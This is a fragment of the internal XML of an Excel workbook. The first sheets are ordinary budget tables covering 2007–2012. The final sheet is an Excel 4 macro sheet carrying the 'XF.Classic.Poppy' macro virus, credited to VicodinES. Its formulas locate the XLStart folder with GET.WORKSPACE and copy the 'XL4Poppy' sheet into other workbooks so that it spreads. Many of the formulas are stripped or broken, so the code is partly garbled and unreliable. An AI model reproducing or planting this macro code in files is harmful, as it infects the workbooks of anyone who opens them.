      <c r="L21" s="116"/>
    </row>
    <row r="22" spans="1:12" ht="27" customHeight="1">
      <c r="A22" s="115"/>
      <c r="B22" s="115"/>
      <c r="C22" s="115"/>
      <c r="D22" s="115"/>
      <c r="E22" s="115"/>
      <c r="F22" s="115"/>
      <c r="G22" s="115"/>
      <c r="H22" s="115"/>
      <c r="I22" s="115"/>
      <c r="J22" s="39"/>
      <c r="K22" s="39"/>
      <c r="L22" s="116"/>
    </row>
    <row r="23" spans="1:12" ht="27" customHeight="1">
      <c r="A23" s="115"/>
      <c r="B23" s="115"/>
      <c r="C23" s="115"/>
      <c r="D23" s="115"/>
      <c r="E23" s="115"/>
      <c r="F23" s="115"/>
      <c r="G23" s="115"/>
      <c r="H23" s="115"/>
      <c r="I23" s="115"/>
      <c r="J23" s="39"/>
      <c r="K23" s="39"/>
      <c r="L23" s="116"/>
    </row>
    <row r="24" spans="1:12" ht="27" customHeight="1">
      <c r="A24" s="115"/>
      <c r="B24" s="115"/>
      <c r="C24" s="115"/>
      <c r="D24" s="115"/>
      <c r="E24" s="115"/>
      <c r="F24" s="115"/>
      <c r="G24" s="115"/>
      <c r="H24" s="115"/>
      <c r="I24" s="115"/>
      <c r="J24" s="39"/>
      <c r="K24" s="39"/>
      <c r="L24" s="116"/>
    </row>
    <row r="25" spans="1:12" ht="21" customHeight="1">
      <c r="A25" s="115"/>
      <c r="B25" s="115"/>
      <c r="C25" s="115"/>
      <c r="D25" s="115"/>
      <c r="E25" s="115"/>
      <c r="F25" s="115"/>
      <c r="G25" s="115"/>
      <c r="H25" s="115"/>
      <c r="I25" s="115"/>
      <c r="J25" s="39"/>
      <c r="K25" s="39"/>
      <c r="L25" s="116"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="18">
    <mergeCell ref="A1:D1"/>
    <mergeCell ref="A2:L2"/>
    <mergeCell ref="F3:H3"/>
    <mergeCell ref="A4:I4"/>
    <mergeCell ref="B5:I5"/>
    <mergeCell ref="C6:I6"/>
    <mergeCell ref="D7:I7"/>
    <mergeCell ref="E8:I8"/>
    <mergeCell ref="F9:I9"/>
    <mergeCell ref="F16:I16"/>
    <mergeCell ref="F10:I10"/>
    <mergeCell ref="G11:I11"/>
    <mergeCell ref="G17:I17"/>
    <mergeCell ref="A18:I18"/>
    <mergeCell ref="C12:I12"/>
    <mergeCell ref="D13:I13"/>
    <mergeCell ref="E14:I14"/>
    <mergeCell ref="F15:I15"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.3937007874015748" right="0.3937007874015748" top="0.7874015748031497" bottom="0.7874015748031497" header="0.5118110236220472" footer="0.5118110236220472"/>
  <pageSetup firstPageNumber="15" useFirstPageNumber="1" fitToHeight="0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2"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScaleNormal="75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:H1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.88671875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="4" width="8.3359375" style="14" customWidth="1"/>
    <col min="5" max="5" width="6.77734375" style="14" customWidth="1"/>
    <col min="6" max="12" width="8.3359375" style="14" customWidth="1"/>
    <col min="13" max="13" width="6.77734375" style="14" customWidth="1"/>
    <col min="14" max="15" width="8.3359375" style="14" customWidth="1"/>
    <col min="16" max="16384" width="8.88671875" style="14" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="21.75">
      <c r="A1" s="143" t="s">
        <v>119</v>
      </c>
      <c r="B1" s="143"/>
      <c r="C1" s="143"/>
      <c r="D1" s="143"/>
      <c r="E1" s="143"/>
      <c r="F1" s="143"/>
      <c r="G1" s="143"/>
      <c r="H1" s="143"/>
    </row>
    <row r="2" ht="19.5" customHeight="1" thickBot="1">
      <c r="O2" s="32" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="3" spans="1:15" ht="24.75" customHeight="1">
      <c r="A3" s="186" t="s">
        <v>121</v>
      </c>
      <c r="B3" s="163" t="s">
        <v>122</v>
      </c>
      <c r="C3" s="188"/>
      <c r="D3" s="188"/>
      <c r="E3" s="188"/>
      <c r="F3" s="188"/>
      <c r="G3" s="188"/>
      <c r="H3" s="188"/>
      <c r="I3" s="163" t="s">
        <v>123</v>
      </c>
      <c r="J3" s="163"/>
      <c r="K3" s="163"/>
      <c r="L3" s="163"/>
      <c r="M3" s="163"/>
      <c r="N3" s="163"/>
      <c r="O3" s="165" t="s">
        <v>124</v>
      </c>
    </row>
    <row r="4" spans="1:15" ht="49.5" customHeight="1" thickBot="1">
      <c r="A4" s="187"/>
      <c r="B4" s="118" t="s">
        <v>125</v>
      </c>
      <c r="C4" s="118" t="s">
        <v>126</v>
      </c>
      <c r="D4" s="118" t="s">
        <v>127</v>
      </c>
      <c r="E4" s="118" t="s">
        <v>128</v>
      </c>
      <c r="F4" s="118" t="s">
        <v>129</v>
      </c>
      <c r="G4" s="118" t="s">
        <v>130</v>
      </c>
      <c r="H4" s="118" t="s">
        <v>131</v>
      </c>
      <c r="I4" s="118" t="s">
        <v>132</v>
      </c>
      <c r="J4" s="118" t="s">
        <v>133</v>
      </c>
      <c r="K4" s="118" t="s">
        <v>134</v>
      </c>
      <c r="L4" s="119" t="s">
        <v>135</v>
      </c>
      <c r="M4" s="118" t="s">
        <v>136</v>
      </c>
      <c r="N4" s="118" t="s">
        <v>131</v>
      </c>
      <c r="O4" s="189"/>
    </row>
    <row r="5" spans="1:15" s="35" customFormat="1" ht="45" customHeight="1" thickTop="1">
      <c r="A5" s="120" t="s">
        <v>137</v>
      </c>
      <c r="B5" s="54">
        <f aca="true" t="shared" si="0" ref="B5:B11">SUM(C5:H5)</f>
        <v>618714</v>
      </c>
      <c r="C5" s="54">
        <v>300000</v>
      </c>
      <c r="D5" s="54">
        <v>0</v>
      </c>
      <c r="E5" s="54">
        <v>0</v>
      </c>
      <c r="F5" s="54">
        <v>0</v>
      </c>
      <c r="G5" s="54">
        <v>318714</v>
      </c>
      <c r="H5" s="54">
        <v>0</v>
      </c>
      <c r="I5" s="54">
        <f aca="true" t="shared" si="1" ref="I5:I11">SUM(J5:N5)</f>
        <v>315712</v>
      </c>
      <c r="J5" s="54">
        <v>315400</v>
      </c>
      <c r="K5" s="54">
        <v>0</v>
      </c>
      <c r="L5" s="54">
        <v>0</v>
      </c>
      <c r="M5" s="54">
        <v>0</v>
      </c>
      <c r="N5" s="54">
        <v>312</v>
      </c>
      <c r="O5" s="55">
        <f aca="true" t="shared" si="2" ref="O5:O11">B5-I5</f>
        <v>303002</v>
      </c>
    </row>
    <row r="6" spans="1:15" s="35" customFormat="1" ht="45" customHeight="1">
      <c r="A6" s="121">
        <v>2007</v>
      </c>
      <c r="B6" s="54">
        <f t="shared" si="0"/>
        <v>12206</v>
      </c>
      <c r="C6" s="54">
        <v>0</v>
      </c>
      <c r="D6" s="54">
        <v>0</v>
      </c>
      <c r="E6" s="54">
        <v>0</v>
      </c>
      <c r="F6" s="54">
        <v>0</v>
      </c>
      <c r="G6" s="54">
        <v>12206</v>
      </c>
      <c r="H6" s="54">
        <v>0</v>
      </c>
      <c r="I6" s="54">
        <f t="shared" si="1"/>
        <v>12000</v>
      </c>
      <c r="J6" s="54">
        <v>12000</v>
      </c>
      <c r="K6" s="54">
        <v>0</v>
      </c>
      <c r="L6" s="54">
        <v>0</v>
      </c>
      <c r="M6" s="54">
        <v>0</v>
      </c>
      <c r="N6" s="54">
        <v>0</v>
      </c>
      <c r="O6" s="55">
        <f t="shared" si="2"/>
        <v>206</v>
      </c>
    </row>
    <row r="7" spans="1:15" s="35" customFormat="1" ht="45" customHeight="1">
      <c r="A7" s="121">
        <v>2008</v>
      </c>
      <c r="B7" s="54">
        <f t="shared" si="0"/>
        <v>15072</v>
      </c>
      <c r="C7" s="54">
        <v>0</v>
      </c>
      <c r="D7" s="54">
        <v>0</v>
      </c>
      <c r="E7" s="54">
        <v>0</v>
      </c>
      <c r="F7" s="54">
        <v>0</v>
      </c>
      <c r="G7" s="54">
        <v>15072</v>
      </c>
      <c r="H7" s="54">
        <v>0</v>
      </c>
      <c r="I7" s="54">
        <f t="shared" si="1"/>
        <v>12000</v>
      </c>
      <c r="J7" s="54">
        <v>12000</v>
      </c>
      <c r="K7" s="54">
        <v>0</v>
      </c>
      <c r="L7" s="54">
        <v>0</v>
      </c>
      <c r="M7" s="54">
        <v>0</v>
      </c>
      <c r="N7" s="54">
        <v>0</v>
      </c>
      <c r="O7" s="55">
        <f t="shared" si="2"/>
        <v>3072</v>
      </c>
    </row>
    <row r="8" spans="1:15" s="35" customFormat="1" ht="45" customHeight="1">
      <c r="A8" s="121">
        <v>2009</v>
      </c>
      <c r="B8" s="54">
        <f t="shared" si="0"/>
        <v>8229</v>
      </c>
      <c r="C8" s="54">
        <v>0</v>
      </c>
      <c r="D8" s="54">
        <v>0</v>
      </c>
      <c r="E8" s="54">
        <v>0</v>
      </c>
      <c r="F8" s="54">
        <v>0</v>
      </c>
      <c r="G8" s="54">
        <v>8229</v>
      </c>
      <c r="H8" s="54">
        <v>0</v>
      </c>
      <c r="I8" s="54">
        <f t="shared" si="1"/>
        <v>12000</v>
      </c>
      <c r="J8" s="54">
        <v>12000</v>
      </c>
      <c r="K8" s="54">
        <v>0</v>
      </c>
      <c r="L8" s="54">
        <v>0</v>
      </c>
      <c r="M8" s="54">
        <v>0</v>
      </c>
      <c r="N8" s="54">
        <v>0</v>
      </c>
      <c r="O8" s="55">
        <f t="shared" si="2"/>
        <v>-3771</v>
      </c>
    </row>
    <row r="9" spans="1:15" s="35" customFormat="1" ht="45" customHeight="1">
      <c r="A9" s="121">
        <v>2010</v>
      </c>
      <c r="B9" s="54">
        <f t="shared" si="0"/>
        <v>9163</v>
      </c>
      <c r="C9" s="54">
        <v>0</v>
      </c>
      <c r="D9" s="54">
        <v>0</v>
      </c>
      <c r="E9" s="54">
        <v>0</v>
      </c>
      <c r="F9" s="54">
        <v>0</v>
      </c>
      <c r="G9" s="54">
        <v>9163</v>
      </c>
      <c r="H9" s="54">
        <v>0</v>
      </c>
      <c r="I9" s="54">
        <f t="shared" si="1"/>
        <v>10000</v>
      </c>
      <c r="J9" s="54">
        <v>10000</v>
      </c>
      <c r="K9" s="54">
        <v>0</v>
      </c>
      <c r="L9" s="54">
        <v>0</v>
      </c>
      <c r="M9" s="54">
        <v>0</v>
      </c>
      <c r="N9" s="54">
        <v>0</v>
      </c>
      <c r="O9" s="55">
        <f t="shared" si="2"/>
        <v>-837</v>
      </c>
    </row>
    <row r="10" spans="1:15" s="35" customFormat="1" ht="45" customHeight="1">
      <c r="A10" s="122">
        <v>2011</v>
      </c>
      <c r="B10" s="56">
        <f t="shared" si="0"/>
        <v>9278</v>
      </c>
      <c r="C10" s="56">
        <v>0</v>
      </c>
      <c r="D10" s="56">
        <v>0</v>
      </c>
      <c r="E10" s="56">
        <v>0</v>
      </c>
      <c r="F10" s="56">
        <v>0</v>
      </c>
      <c r="G10" s="56">
        <v>9278</v>
      </c>
      <c r="H10" s="56">
        <v>0</v>
      </c>
      <c r="I10" s="56">
        <f t="shared" si="1"/>
        <v>9000</v>
      </c>
      <c r="J10" s="56">
        <v>9000</v>
      </c>
      <c r="K10" s="56">
        <v>0</v>
      </c>
      <c r="L10" s="56">
        <v>0</v>
      </c>
      <c r="M10" s="56">
        <v>0</v>
      </c>
      <c r="N10" s="56">
        <v>0</v>
      </c>
      <c r="O10" s="57">
        <f t="shared" si="2"/>
        <v>278</v>
      </c>
    </row>
    <row r="11" spans="1:15" s="35" customFormat="1" ht="45" customHeight="1" thickBot="1">
      <c r="A11" s="122">
        <v>2012</v>
      </c>
      <c r="B11" s="56">
        <f t="shared" si="0"/>
        <v>9000</v>
      </c>
      <c r="C11" s="56">
        <v>0</v>
      </c>
      <c r="D11" s="56">
        <v>0</v>
      </c>
      <c r="E11" s="56">
        <v>0</v>
      </c>
      <c r="F11" s="56">
        <v>0</v>
      </c>
      <c r="G11" s="56">
        <v>9000</v>
      </c>
      <c r="H11" s="56">
        <v>0</v>
      </c>
      <c r="I11" s="56">
        <f t="shared" si="1"/>
        <v>9000</v>
      </c>
      <c r="J11" s="56">
        <v>9000</v>
      </c>
      <c r="K11" s="56">
        <v>0</v>
      </c>
      <c r="L11" s="56">
        <v>0</v>
      </c>
      <c r="M11" s="56">
        <v>0</v>
      </c>
      <c r="N11" s="56">
        <v>0</v>
      </c>
      <c r="O11" s="57">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:15" s="35" customFormat="1" ht="45" customHeight="1" thickBot="1" thickTop="1">
      <c r="A12" s="131" t="s">
        <v>142</v>
      </c>
      <c r="B12" s="132">
        <f>SUM(B5:B11)</f>
        <v>681662</v>
      </c>
      <c r="C12" s="132">
        <f aca="true" t="shared" si="3" ref="C12:O12">SUM(C5:C11)</f>
        <v>300000</v>
      </c>
      <c r="D12" s="132">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E12" s="132">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="F12" s="132">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="G12" s="132">
        <f t="shared" si="3"/>
        <v>381662</v>
      </c>
      <c r="H12" s="132">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="I12" s="132">
        <f t="shared" si="3"/>
        <v>379712</v>
      </c>
      <c r="J12" s="132">
        <f t="shared" si="3"/>
        <v>379400</v>
      </c>
      <c r="K12" s="132">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="L12" s="132">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M12" s="132">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="N12" s="132">
        <f t="shared" si="3"/>
        <v>312</v>
      </c>
      <c r="O12" s="117">
        <f t="shared" si="3"/>
        <v>301950</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="5">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:H3"/>
    <mergeCell ref="I3:N3"/>
    <mergeCell ref="O3:O4"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.3937007874015748" right="0.3937007874015748" top="0.7874015748031497" bottom="0.7874015748031497" header="0.5118110236220472" footer="0.5118110236220472"/>
  <pageSetup fitToHeight="0"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5"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="A1" sqref="A1:F1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.88671875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="7" width="17.3359375" style="14" customWidth="1"/>
    <col min="8" max="16384" width="8.88671875" style="14" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="21.75">
      <c r="A1" s="143" t="s">
        <v>35</v>
      </c>
      <c r="B1" s="143"/>
      <c r="C1" s="143"/>
      <c r="D1" s="143"/>
      <c r="E1" s="143"/>
      <c r="F1" s="143"/>
    </row>
    <row r="2" ht="15" customHeight="1" thickBot="1">
      <c r="G2" s="32" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="3" spans="1:7" ht="33.75" customHeight="1">
      <c r="A3" s="193" t="s">
        <v>43</v>
      </c>
      <c r="B3" s="195" t="s">
        <v>36</v>
      </c>
      <c r="C3" s="197" t="s">
        <v>37</v>
      </c>
      <c r="D3" s="198"/>
      <c r="E3" s="198"/>
      <c r="F3" s="199"/>
      <c r="G3" s="200" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="4" spans="1:7" ht="33.75" customHeight="1" thickBot="1">
      <c r="A4" s="194"/>
      <c r="B4" s="196"/>
      <c r="C4" s="118" t="s">
        <v>61</v>
      </c>
      <c r="D4" s="118" t="s">
        <v>62</v>
      </c>
      <c r="E4" s="118" t="s">
        <v>63</v>
      </c>
      <c r="F4" s="118" t="s">
        <v>41</v>
      </c>
      <c r="G4" s="201"/>
    </row>
    <row r="5" spans="1:7" s="35" customFormat="1" ht="33.75" customHeight="1" thickTop="1">
      <c r="A5" s="133" t="s">
        <v>140</v>
      </c>
      <c r="B5" s="134"/>
      <c r="C5" s="135">
        <f>SUM(C6,C11)</f>
        <v>301672</v>
      </c>
      <c r="D5" s="135">
        <f>SUM(D6,D11)</f>
        <v>301950</v>
      </c>
      <c r="E5" s="135">
        <f>SUM(E6,E11)</f>
        <v>301950</v>
      </c>
      <c r="F5" s="135">
        <f>E5-D5</f>
        <v>0</v>
      </c>
      <c r="G5" s="136"/>
    </row>
    <row r="6" spans="1:7" s="35" customFormat="1" ht="33.75" customHeight="1">
      <c r="A6" s="190" t="s">
        <v>38</v>
      </c>
      <c r="B6" s="40" t="s">
        <v>40</v>
      </c>
      <c r="C6" s="123">
        <f>SUM(C7:C10)</f>
        <v>301672</v>
      </c>
      <c r="D6" s="123">
        <f>SUM(D7:D10)</f>
        <v>301950</v>
      </c>
      <c r="E6" s="123">
        <f>SUM(E7:E10)</f>
        <v>301950</v>
      </c>
      <c r="F6" s="123">
        <f aca="true" t="shared" si="0" ref="F6:F11">E6-D6</f>
        <v>0</v>
      </c>
      <c r="G6" s="34"/>
    </row>
    <row r="7" spans="1:7" s="35" customFormat="1" ht="33.75" customHeight="1">
      <c r="A7" s="191"/>
      <c r="B7" s="40" t="s">
        <v>138</v>
      </c>
      <c r="C7" s="123">
        <v>301672</v>
      </c>
      <c r="D7" s="123">
        <v>301950</v>
      </c>
      <c r="E7" s="123">
        <v>301950</v>
      </c>
      <c r="F7" s="123">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G7" s="34"/>
    </row>
    <row r="8" spans="1:7" s="35" customFormat="1" ht="33.75" customHeight="1">
      <c r="A8" s="191"/>
      <c r="B8" s="33"/>
      <c r="C8" s="123"/>
      <c r="D8" s="123"/>
      <c r="E8" s="123"/>
      <c r="F8" s="123"/>
      <c r="G8" s="34"/>
    </row>
    <row r="9" spans="1:7" s="35" customFormat="1" ht="33.75" customHeight="1">
      <c r="A9" s="191"/>
      <c r="B9" s="33"/>
      <c r="C9" s="123"/>
      <c r="D9" s="123"/>
      <c r="E9" s="123"/>
      <c r="F9" s="123"/>
      <c r="G9" s="34"/>
    </row>
    <row r="10" spans="1:7" s="35" customFormat="1" ht="33.75" customHeight="1">
      <c r="A10" s="202"/>
      <c r="B10" s="33"/>
      <c r="C10" s="123"/>
      <c r="D10" s="123"/>
      <c r="E10" s="123"/>
      <c r="F10" s="123"/>
      <c r="G10" s="34"/>
    </row>
    <row r="11" spans="1:7" s="35" customFormat="1" ht="33.75" customHeight="1">
      <c r="A11" s="190" t="s">
        <v>39</v>
      </c>
      <c r="B11" s="40" t="s">
        <v>40</v>
      </c>
      <c r="C11" s="123">
        <f>SUM(C12:C15)</f>
        <v>0</v>
      </c>
      <c r="D11" s="123">
        <f>SUM(D12:D15)</f>
        <v>0</v>
      </c>
      <c r="E11" s="123">
        <f>SUM(E12:E15)</f>
        <v>0</v>
      </c>
      <c r="F11" s="123">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G11" s="34"/>
    </row>
    <row r="12" spans="1:7" s="35" customFormat="1" ht="33.75" customHeight="1">
      <c r="A12" s="191"/>
      <c r="B12" s="33"/>
      <c r="C12" s="123"/>
      <c r="D12" s="123"/>
      <c r="E12" s="123"/>
      <c r="F12" s="123"/>
      <c r="G12" s="34"/>
    </row>
    <row r="13" spans="1:7" s="35" customFormat="1" ht="33.75" customHeight="1">
      <c r="A13" s="191"/>
      <c r="B13" s="33"/>
      <c r="C13" s="123"/>
      <c r="D13" s="123"/>
      <c r="E13" s="123"/>
      <c r="F13" s="123"/>
      <c r="G13" s="34"/>
    </row>
    <row r="14" spans="1:7" s="35" customFormat="1" ht="33.75" customHeight="1">
      <c r="A14" s="191"/>
      <c r="B14" s="33"/>
      <c r="C14" s="123"/>
      <c r="D14" s="123"/>
      <c r="E14" s="123"/>
      <c r="F14" s="123"/>
      <c r="G14" s="34"/>
    </row>
    <row r="15" spans="1:7" s="35" customFormat="1" ht="33.75" customHeight="1" thickBot="1">
      <c r="A15" s="192"/>
      <c r="B15" s="36"/>
      <c r="C15" s="124"/>
      <c r="D15" s="124"/>
      <c r="E15" s="124"/>
      <c r="F15" s="124"/>
      <c r="G15" s="41"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="7">
    <mergeCell ref="A11:A15"/>
    <mergeCell ref="A1:F1"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:B4"/>
    <mergeCell ref="C3:F3"/>
    <mergeCell ref="G3:G4"/>
    <mergeCell ref="A6:A10"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.3937007874015748" right="0.3937007874015748" top="0.7874015748031497" bottom="0.7874015748031497" header="0.5118110236220472" footer="0.5118110236220472"/>
  <pageSetup fitToHeight="0"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41"/>
  <sheetViews>
    <sheetView showFormulas="1" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="C1" sqref="C1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="7.10546875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="23.21484375" style="2" customWidth="1"/>
    <col min="2" max="2" width="0.9921875" style="2" customWidth="1"/>
    <col min="3" max="3" width="24.99609375" style="2" customWidth="1"/>
    <col min="4" max="16384" width="7.10546875" style="2" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="12.75">
      <c r="A1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C1" s="2" t="b">
        <f>"XL4Poppy"</f>
        <v>0</v>
      </c>
    </row>
    <row r="2" ht="13.5" thickBot="1">
      <c r="A2" s="1" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="13.5" thickBot="1">
      <c r="A3" s="3" t="s">
        <v>7</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="12.75">
      <c r="A4" s="3">
        <v>3</v>
      </c>
      <c r="C4" s="5" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="12.75">
      <c r="C5" s="5" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="6" ht="13.5" thickBot="1">
      <c r="C6" s="5" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="7" spans="1:3" ht="12.75">
      <c r="A7" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C7" s="5" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="8" spans="1:3" ht="12.75">
      <c r="A8" s="7" t="s">
        <v>10</v>
      </c>
      <c r="C8" s="5" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="9" spans="1:3" ht="12.75">
      <c r="A9" s="8" t="s">
        <v>11</v>
      </c>
      <c r="C9" s="5" t="e">
        <f>FALSE</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="10" spans="1:3" ht="12.75">
      <c r="A10" s="7" t="s">
        <v>12</v>
      </c>
      <c r="C10" s="5" t="b">
        <f>A21</f>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:3" ht="13.5" thickBot="1">
      <c r="A11" s="9" t="s">
        <v>13</v>
      </c>
      <c r="C11" s="5" t="b">
        <f>"6:30:00 PM","Hello"</f>
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="12.75">
      <c r="C12" s="5" t="b">
        <f>"6:30:00 AM","Morning"</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="13.5" thickBot="1">
      <c r="C13" s="5" t="b">
        <f>,"Poppy",TRUE</f>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:3" ht="13.5" thickBot="1">
      <c r="A14" s="4" t="s">
        <v>14</v>
      </c>
      <c r="C14" s="10" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="15" ht="12.75">
      <c r="A15" s="5" t="b">
        <f>"XF.Classic.Poppy by VicodinES",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="13.5" thickBot="1">
      <c r="A16" s="5" t="b">
        <f>"ⓒ 1998 The Narkotic Network",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:3" ht="13.5" thickBot="1">
      <c r="A17" s="10" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
      <c r="C17" s="4" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="18" ht="12.75">
      <c r="C18" s="5" t="e">
        <f>$A$3(GET.WORKSPACE(32)&amp;"\xlstart\Book1.")</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="19" ht="12.75">
      <c r="C19" s="5" t="e">
        <f>"Document_array",</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="20" spans="1:3" ht="12.75">
      <c r="A20" s="11" t="s">
        <v>16</v>
      </c>
      <c r="C20" s="5" t="e">
        <f>$A$1INDEX(,2)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="21" spans="1:3" ht="12.75">
      <c r="A21" s="12" t="e">
        <f>IF(A3="Book1.",0,99)</f>
        <v>#NAME?</v>
      </c>
      <c r="C21" s="5" t="e">
        <f>$A$2INDEX(,1)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="22" spans="1:3" ht="12.75">
      <c r="A22" s="5" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
      <c r="C22" s="5" t="e">
        <f>$A$4GET.DOCUMENT(3,"["&amp;A1&amp;"]"&amp;"XL4Poppy")</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="23" spans="1:3" ht="12.75">
      <c r="A23" s="5" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C23" s="10" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="24" ht="12.75">
      <c r="A24" s="5" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="25" ht="12.75">
      <c r="A25" s="5" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="26" spans="1:3" ht="13.5" thickBot="1">
      <c r="A26" s="5" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C26" s="13" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="27" spans="1:3" ht="12.75">
      <c r="A27" s="5" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C27" s="5" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:3" ht="12.75">
      <c r="A28" s="5" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C28" s="5" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="29" spans="1:3" ht="12.75">
      <c r="A29" s="5" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C29" s="5" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="30" spans="1:3" ht="12.75">
      <c r="A30" s="5" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
      <c r="C30" s="5" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="31" spans="1:3" ht="12.75">
      <c r="A31" s="5" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
      <c r="C31" s="5" t="e">
        <f>FALSE</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="32" spans="1:3" ht="12.75">
      <c r="A32" s="5" t="b">
        <f>"Sheet3","Sheet99"</f>
        <v>0</v>
      </c>
      <c r="C32" s="5" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:3" ht="12.75">
      <c r="A33" s="5" t="b">
        <f>"Sheet1","Sheet3"</f>
        <v>0</v>
      </c>
      <c r="C33" s="5" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:3" ht="12.75">
      <c r="A34" s="5" t="b">
        <f>"Sheet99","Sheet1"</f>
        <v>0</v>
      </c>
      <c r="C34" s="5" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:3" ht="12.75">
      <c r="A35" s="5" t="b">
        <f>TRUE,,"VicodinES",TRUE</f>
        <v>0</v>
      </c>
      <c r="C35" s="5" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="36" spans="1:3" ht="12.75">
      <c r="A36" s="5" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C36" s="10" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="37" ht="12.75">
      <c r="A37" s="5" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="12.75">
      <c r="A38" s="5" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:3" ht="12.75">
      <c r="A39" s="5" t="b">
        <f>A3</f>
        <v>0</v>
      </c>
      <c r="C39" s="12" t="e">
        <f>"XF.Classic.Poppy"</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="40" spans="1:3" ht="12.75">
      <c r="A40" s="5" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C40" s="5" t="b">
        <f>TRUE,"VicodinES and Lord Natas greet you a good morning!"</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:3" ht="12.75">
      <c r="A41" s="10" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
